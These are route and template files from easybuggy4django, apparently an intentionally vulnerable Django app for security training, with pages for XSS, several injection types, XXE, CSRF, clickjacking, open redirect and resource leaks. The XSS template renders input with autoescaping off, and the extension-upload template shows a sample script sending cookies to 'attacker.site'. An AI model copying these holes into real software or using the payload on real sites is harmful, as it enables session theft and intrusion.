easybuggy4django_original/config/urls.py
from django.contrib import admin
from django.urls import path
from django.conf.urls import include, url

from django.contrib.auth.views import LoginView, LogoutView

urlpatterns = [ ]

urlpatterns = [
    path('admin/', admin.site.urls),
    url('registration/', include('django.contrib.auth.urls')),
    url(r'^', include('easybuggy.urls', namespace='easybuggy')),
]

easybuggy4django_original/easybuggy/urls.py
from django.conf.urls import url
from . import views

app_name = "easybuggy"

urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^login/*', views.admins_login, name='admins_login'),
    url(r'^logout/$', views.admins_logout, name='admins_logout'),
    url(r'^admins/main*', views.main, name='main'),
    url(r'^admins/csrf/$', views.csrf, name='csrf'),
    url(r'^admins/clickjacking/$', views.clickjacking, name='clickjacking'),
    url(r'^ping/$', views.ping, name='ping'),
    url(r'^deadlock/$', views.deadlock, name='deadlock'),
    url(r'^deadlock2/$', views.deadlock2, name='deadlock2'),
    url(r'^infiniteloop/$', views.infiniteloop, name='infiniteloop'),
    url(r'^redirectloop/$', views.redirectloop, name='redirectloop'),
    url(r'^memoryleak/$', views.memoryleak, name='memoryleak'),
    url(r'^netsocketleak/$', views.network_socket_leak, name='netsocketleak'),
    url(r'^dbconnectionleak/$', views.db_connection_leak, name='dbconnectionleak'),
    url(r'^filedescriptorleak/$', views.file_descriptor_leak, name='filedescriptorleak'),
    url(r'^threadleak/$', views.thread_leak, name='threadleak'),
    url(r'^mojibake/$', views.mojibake, name='mojibake'),
    url(r'^iof/$', views.integer_overflow, name='iof'),
    url(r'^lotd/$', views.loss_of_trailing_digits, name='lotd'),
    url(r'^roe/$', views.round_off_error, name='roe'),
    url(r'^te/$', views.truncation_error, name='te'),
    url(r'^xss/$', views.xss, name='xss'),
    url(r'^sqlijc/$', views.sql_injection, name='sqlijc'),
    url(r'^codeijct/$', views.code_injection, name='codeijct'),
    url(r'^commandijct/$', views.command_injection, name='commandijct'),
    url(r'^mailheaderijct/$', views.mail_header_injection, name='mailheaderijct'),
    url(r'^unrestrictedsizeupload/$', views.unrestricted_size_upload, name='unrestrictedsizeupload'),
    url(r'^unrestrictedextupload/$', views.unrestricted_extension_upload, name='unrestrictedextupload'),
    url(r'^xxe/$', views.xxe, name='xxe'),
    url(r'^ldapijc/*', views.ldap_injection, name='ldapijc'),
    url(r'^bruteforce/*', views.brute_force, name='bruteforce'),
    url(r'^openredirect/*', views.open_redirect, name='openredirect'),
    url(r'^verbosemsg/*', views.verbose_message, name='verbosemsg'),
]

easybuggy4django_original/templates/clickjacking.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post" enctype="application/x-www-form-urlencoded">
    {% csrf_token %}
    <p>{% trans 'msg.enter.mail' %}</p><br/>
    <label>{% trans 'label.mail' %}</label><span>: </span>
    <input type="text" name="mail" size="30" maxlength="30"/><br/>
    <br/> <input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    {% if complete %}
    <p>{% trans 'msg.mail.changed' %}</p><a href="/admins/main">{% trans 'label.goto.admin.page' %}</a><br/><br/>
    {% endif %}
    {% include "messages.html" %}
</form>
{% endblock %}

easybuggy4django_original/templates/codeinjection.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post">
    {% csrf_token %}
    <p>{% trans 'msg.enter.math.expression' %}</p>
    <input type="text" name="expression" size="80" maxlength="300" value="{{expression}}"/> =
    {% if value %}
    <span>{{value}}</span>
    {% endif %}
    <br/><br/>
    <input type="submit" value="{% trans 'label.calculate' %}"/><br/><br/>
    {% include "messages.html" %}
</form>
{% endblock %}

easybuggy4django_original/templates/commandinjection.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post">
    {% csrf_token %}
    <p>{% trans 'msg.enter.mail.address' %}</p>
    <input type="text" name="address" size="100" maxlength="100" value="{{address}}"/><br/><br/>
    {% if result %}
    <span>{{result}}</span><br/><br/>
    {% endif %}
    <input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    {% include "messages.html" %}
</form>
{% endblock %}

easybuggy4django_original/templates/dbconnectionleak.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<table class="table table-striped table-bordered table-hover" style="font-size: small;">
    <tr>
        <th>{% trans 'label.user.id' %}</th>
        <th>{% trans 'label.name' %}</th>
        <th>{% trans 'label.phone' %}</th>
        <th>{% trans 'label.mail' %}</th>
    </tr>
    {% for user in users %}
    <tr>
        <td>{{ user.0 }}</td>
        <td>{{ user.1 }}</td>
        <td>{{ user.2|default_if_none:'' }}</td>
        <td>{{ user.3|default_if_none:'' }}</td>
    </tr>
    {% endfor %}
</table>
{% include "messages.html" %}
{% endblock %}

easybuggy4django_original/templates/filedescriptorleak.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<p>{% trans 'description.access.history' %}<p/>
<table class="table table-striped table-bordered table-hover" style="font-size: small;">
    <tr>
        <th>{% trans 'label.access.time' %}</th>
        <th>{% trans 'label.ip.address' %}</th>
        <th>{% trans 'label.session.id' %}</th>
    </tr>
    {% for access in history %}
    <tr>
        <td>{{ access.0 }}</td>
        <td>{{ access.1 }}</td>
        <td>{{ access.2 }}</td>
    </tr>
    {% endfor %}
</table>

{% include "messages.html" %}
{% endblock %}

easybuggy4django_original/templates/index.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
<header>
    <table style="margin-top: 20px; width: 720px;">
        <tr>
            <td rowspan="1" colspan="1">
                <img src="/static/easybuggy.png" class="bounceInRight animated"/>
            </td>
            <td rowspan="1" colspan="1"><span class="glyphicon glyphicon-warning-sign"></span>
                <span>{% trans 'description.all' %}</span>
            </td>
        </tr>
    </table>
</header>
<hr/>

{% if not isOnlyVulnerabilities %}
<h2>
    <span class="glyphicon glyphicon-knight"></span>
    <span>{% trans 'section.troubles' %}</span>
</h2>
<p>{% trans 'description.troubles' %}</p>
<ul>
    <li><p><a href="{% url 'easybuggy:deadlock' %}" shape="rect">
        {% trans 'function.name.dead.lock' %}</a>:
        <span>{% trans 'function.description.dead.lock' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:deadlock2' %}" shape="rect">
        {% trans 'function.name.dead.lock2' %}</a>:
        <span>{% trans 'function.description.dead.lock2' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:infiniteloop' %}" target="_blank" shape="rect">
        {% trans 'function.name.infinite.loop' %}</a>:
        <span>{% trans 'function.description.infinite.loop' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:redirectloop' %}" target="_blank" shape="rect">
        {% trans 'function.name.redirect.loop' %}</a>:
        <span>{% trans 'function.description.redirect.loop' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:memoryleak' %}" shape="rect">
        {% trans 'function.name.memory.leak' %}</a>:
        <span>{% trans 'function.description.memory.leak' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:netsocketleak' %}" shape="rect">
        {% trans 'function.name.network.socket.leak' %}</a>:
        <span>{% trans 'function.description.network.socket.leak' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:dbconnectionleak' %}" shape="rect">
        {% trans 'function.name.database.connection.leak' %}</a>:
        <span>{% trans 'function.description.database.connection.leak' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:filedescriptorleak' %}" shape="rect">
        {% trans 'function.name.file.descriptor.leak' %}</a>:
        <span>{% trans 'function.description.file.descriptor.leak' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:threadleak' %}" shape="rect">
        {% trans 'function.name.thread.leak' %}</a>:
        <span>{% trans 'function.description.thread.leak' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:mojibake' %}" shape="rect">
        {% trans 'function.name.mojibake' %}</a>:
        <span>{% trans 'function.description.mojibake' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:iof' %}" shape="rect">
        {% trans 'function.name.int.overflow' %}</a>:
        <span>{% trans 'function.description.int.overflow' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:roe' %}" shape="rect">
        {% trans 'function.name.round.off.error' %}</a>:
        <span>{% trans 'function.description.round.off.error' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:te' %}" shape="rect">
        {% trans 'function.name.truncation.error' %}</a>:
        <span>{% trans 'function.description.truncation.error' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:lotd' %}" shape="rect">
        {% trans 'function.name.loss.of.trailing.digits' %}</a>:
        <span>{% trans 'function.description.loss.of.trailing.digits' %}</span>
    </p></li>
</ul>
{% endif %}

<h2>
    <span class="glyphicon glyphicon-knight"></span>
    <span>{% trans 'section.vulnerabilities' %}</span>
</h2>
<p>{% trans 'description.vulnerabilities' %}</p>
<ul>
    <li><p><a href="{% url 'easybuggy:xss' %}" shape="rect">
        {% trans 'function.name.xss' %}</a>:
        <span>{% trans 'function.description.xss' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:sqlijc' %}" shape="rect">
        {% trans 'function.name.sql.injection' %}</a>:
        <span>{% trans 'function.description.sql.injection' %}</span>
    </p></li>
    <li><p><a href="/admins/main?logintype=ldapijc" shape="rect">
        {% trans 'function.name.ldap.injection' %}</a>:
        <span>{% trans 'function.description.ldap.injection' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:codeijct' %}" shape="rect">
        {% trans 'function.name.code.injection' %}</a>:
        <span>{% trans 'function.description.code.injection' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:commandijct' %}" shape="rect">
        {% trans 'function.name.os.command.injection' %}</a>:
        <span>{% trans 'function.description.os.command.injection' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:mailheaderijct' %}" shape="rect">
        {% trans 'function.name.mail.header.injection' %}</a>:
        <span>{% trans 'function.description.mail.header.injection' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:unrestrictedsizeupload' %}" shape="rect">
        {% trans 'function.name.unrestricted.size.upload' %}</a>:
        <span>{% trans 'function.description.unrestricted.size.upload' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:unrestrictedextupload' %}" shape="rect">
        {% trans 'function.name.unrestricted.ext.upload' %}</a>:
        <span>{% trans 'function.description.unrestricted.ext.upload' %}</span>
    </p></li>
    <li><p><a href="/admins/main?logintype=bruteforce" shape="rect">
        {% trans 'function.name.brute.force' %}</a>:
        <span>{% trans 'function.description.brute.force' %}</span>
    </p></li>
    <li><p><a href="/admins/main?logintype=openredirect&goto=/admin/" shape="rect">
        {% trans 'function.name.open.redirect' %}</a>:
        <span>{% trans 'function.description.open.redirect' %}</span>
    </p></li>
    <li><p><a href="/admins/main?logintype=verbosemsg" shape="rect">
        {% trans 'function.name.verbose.error.message' %}</a>:
        <span>{% trans 'function.description.verbose.error.message' %}</span>
    </p></li>
    <li><p><a href="/admins/csrf" shape="rect">
        {% trans 'function.name.csrf' %}</a>:
        <span>{% trans 'function.description.csrf' %}</span>
    </p></li>
    <li><p><a href="/admins/clickjacking" shape="rect">
        {% trans 'function.name.clickjacking' %}</a>:
        <span>{% trans 'function.description.clickjacking' %}</span>
    </p></li>
    <li><p><a href="{% url 'easybuggy:xxe' %}" shape="rect">
        {% trans 'function.name.xxe' %}</a>:
        <span>{% trans 'function.description.xxe' %}</span>
    </p></li>
</ul>

<hr/>
<footer>
    <img src="/static/easybuggyL.png"/>Copyright &copy; 2018 T246 OSS Lab, all rights reserved.<br/><br/>
</footer>
{% endblock %}

easybuggy4django_original/templates/intoverflow.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post">
    {% csrf_token %}
    <p>{% trans 'msg.question.reach.the.moon' %}</p>
    <input type="text" name="times" size="2" maxlength="2" value="{{times}}"/>
    <span>{% trans 'label.times' %} : {{description}}</span><br/><br/>
    <input type="submit" value="{% trans 'label.calculate' %}"/><br/><br/>
    {% include "messages.html" %}
</form>
{% endblock %}

easybuggy4django_original/templates/mailheaderinjection.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
{% if not isReady %}
<form action="" method="post" enctype="multipart/form-data">
    {% csrf_token %}
    <p>{% trans 'description.send.mail' %}</p>
    <table class="table table-bordered" style="font-size: small;">
        <tr>
            <td>{% trans 'label.your.name' %}:&nbsp;</td>
            <td><input type="text" name="name" size="50"/></td>
        </tr>
        <tr>
            <td>{% trans 'label.your.mail' %}:&nbsp;</td>
            <td><input type="text" name="mail" size="50"/></td>
        </tr>
        <tr>
            <td>{% trans 'label.subject' %}:&nbsp;</td>
            <td><input type="text" name="subject" size="50"/></td>
        </tr>
        <tr>
            <td>{% trans 'label.content' %}:&nbsp;</td>
            <td><textarea rows="10" cols="50" name="content"></textarea></td>
        </tr>
        <tr>
            <td colspan="2" align="center"><input type="submit" value="{% trans 'label.submit' %}"/></td>
        </tr>
    </table>
</form>
{% endif %}
{% include "messages.html" %}
{% endblock %}

easybuggy4django_original/templates/memoryleak.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
    <label>{% trans 'label.process.memory.info' %}</label>
    <table class="table table-striped table-bordered table-hover" style="font-size: small;">
        <tr>
            <th>PID</th>
            <th>Cmdline</th>
            <th>USS</th>
            {% if pss %}<th>PSS</th>{% endif %}
            {% if swap %}<th>Swap</th>{% endif %}
            <th>RES</th>
        </tr>
        <tr>
            <td>{{ pid }}</td>
            <td>{{ info }}</td>
            <td>{{ uss }}<br />({{ pcnt_uss }} %)</td>
            {% if pss %}<td>{{ pss }}<br />({{ pcnt_pss }} %)</td>{% endif %}
            {% if swap %}<td>{{ swap }}</td>{% endif %}
            <td>{{ rss }}<br />({{ pcnt_rss }} %)</td>
        </tr>
    </table>
{% include "messages.html" %}
{% endblock %}

easybuggy4django_original/templates/sqlijc.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post">
    {% csrf_token %}
    <p>{% trans 'msg.enter.name.and.passwd' %}</p><br/>
    <label>{% trans 'label.name' %}</label> :
    <input type="text" name="name" size="20" maxlength="20"/>
    <label>{% trans 'label.password' %}</label> :
    <input type="password" name="password" size="20" maxlength="20" autocomplete="off"/>
    <br/><br/><input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    {% if users %}
    <table class="table table-striped table-bordered table-hover" style="font-size: small;">
        <tr>
            <th>{% trans 'label.name' %}</th>
            <th>{% trans 'label.secret' %}</th>
        </tr>
        {% for user in users %}
        <tr>
            <td>{{ user.name }}</td>
            <td>{{ user.secret }}</td>
        </tr>
        {% endfor %}
    </table>
    {% endif %}
    {% include "messages.html" %}
</form>
{% endblock %}

easybuggy4django_original/templates/threadleak.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<span>{% trans 'label.current.thread.count' %}: {{count}}</span><br/><br/>
{% include "messages.html" %}
{% endblock %}

easybuggy4django_original/templates/unrestrictedextupload.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
{% if file_path %}
<img src="/{{ file_path }}"/><br/><br/>
{% include "messages.html" %}
<input type="button" onClick='history.back();' value="{% trans 'label.history.back' %}"/><br/>
{% else %}
<form action="" method="post" enctype="multipart/form-data">
    {% csrf_token %}
    <p>{% trans 'msg.convert.grayscale' %}<p/>
    <input type="file" name="file" size="60"/>
    <p>{% trans 'msg.select.upload.file' %}<p/>
    <input type="submit" value="{% trans 'label.upload' %}"/>
</form>
<br/>
{% include "messages.html" %}
<pre id="code" class="prettyprint lang-html">
&lt;script&gt;
var img = document.createElement(&#039;img&#039;);
img.src = &#039;http://attacker.site?c=&#039; + encodeURI(document.cookie);
document.body.appendChild(img);
&lt;/script&gt;
</pre>
{% endif %}
{% endblock %}

easybuggy4django_original/templates/unrestrictedsizeupload.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
{% if file_path %}
<img src="/{{ file_path }}"/><br/><br/>
{% include "messages.html" %}
<input type="button" onClick='history.back();' value="{% trans 'label.history.back' %}"/><br/>
{% else %}
<form action="" method="post" enctype="multipart/form-data">
    {% csrf_token %}
    <p>{% trans 'msg.reverse.color' %}<p/>
    <input type="file" name="file" size="60"/>
    <p>{% trans 'msg.select.upload.file' %}<p/>
    <input type="submit" value="{% trans 'label.upload' %}"/>
</form>
<br/>
{% include "messages.html" %}
{% endif %}
{% endblock %}

easybuggy4django_original/templates/xss.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post" enctype="application/x-www-form-urlencoded">
    {% csrf_token %}
    <p>{% trans 'description.reverse.string' %}</p><br/>
    <label>{% trans 'label.string' %}</label><span>: </span>
    <input type="text" name="string" size="100" maxlength="100"/><br/>
    <br/> <input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    {% autoescape off %}
    <p>{{ msg }}</p><br/>
    {% endautoescape %}
    <div class="alert alert-info" role="alert">
        <span class="glyphicon glyphicon-info-sign"></span>
        {% trans 'msg.note.xss' %}
    </div>
</form>
{% endblock %}